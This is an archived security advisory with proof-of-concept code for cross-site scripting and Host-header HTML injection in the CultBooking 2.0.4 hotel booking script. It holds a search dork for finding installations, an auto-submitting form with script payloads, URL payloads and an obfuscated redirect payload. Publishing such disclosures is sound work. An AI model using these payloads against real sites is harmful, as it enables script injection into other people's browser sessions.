CultBooking 2.0.4 Cross Site Scripting
Posted on 25 January 2011
<!-- CultBooking 2.0.4 (cultbooking.php) Multiple XSS/PD Vulnerabilities Vendor: Cultuzz Digital Media GmbH Product web page: http://www.cultuzz.com Affected version: 2.0.4 Summary: Open source hotel booking system (Internet Booking Engine (IBE)). Via a central api called CultSwitch it is possible to make bookings and set the actual availabilities in the hotels pms. This is easy to install and easy to integrate with full support. Desc: CultBooking Hotel Booking System suffers from a XSS/PD vulnerability when parsing user input to the 'bookingcode', 'email' and 'lang' parameter via POST and GET methods in cultbooking.php script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk Advisory ID: ZSL-2011-4987 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4987.php 16.01.2011 --> Dork: "inurl:cultbooking.php" <script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script> <form action="http://1.1.1.2/cultbooking.php" enctype="application/x-www-form-urlencoded" id="xss" method="POST"> <input type="hidden" name="agentsine" value="10492"> <input type="hidden" name="agentdutycode" value ="1429741cfe1700d7"> <input type="hidden" name="lang" id="lang" value="en"> <input type="hidden" name="hcode" value="11225"> <input type="hidden" name="action" value="cancelbooking"> <input type="hidden" name="email" value='"><script>alert(2)</script>' /> <input type="hidden" name="bookingcode" value='"><script>alert(1)</script>' /> </form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit!<h3></center></font></b></a> http://1.1.1.2/cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTML Injection via Header Attack: --------------------------------------------------------------------- POST http://1.1.1.2/cultbooking.php HTTP/1.1 Host: "><zsl><h1>ZSL-CROSS-SCRIPT-EXECUTED" Content-Length: 19 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/2008101401 Firefox/3.1 Accept-Encoding: gzip,deflate Keep-Alive: 50 Connection: Keep-Alive action=cancellation --------------------------------------------------------------------- Affected Header variable: Host magic quotes bypass redirect: http://1.1.1.2/cultbooking.php?lang="><script>document.location.href=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 122, 101, 114, 111, 115, 99, 105, 101, 110, 99, 101, 46, 109, 107);</script>
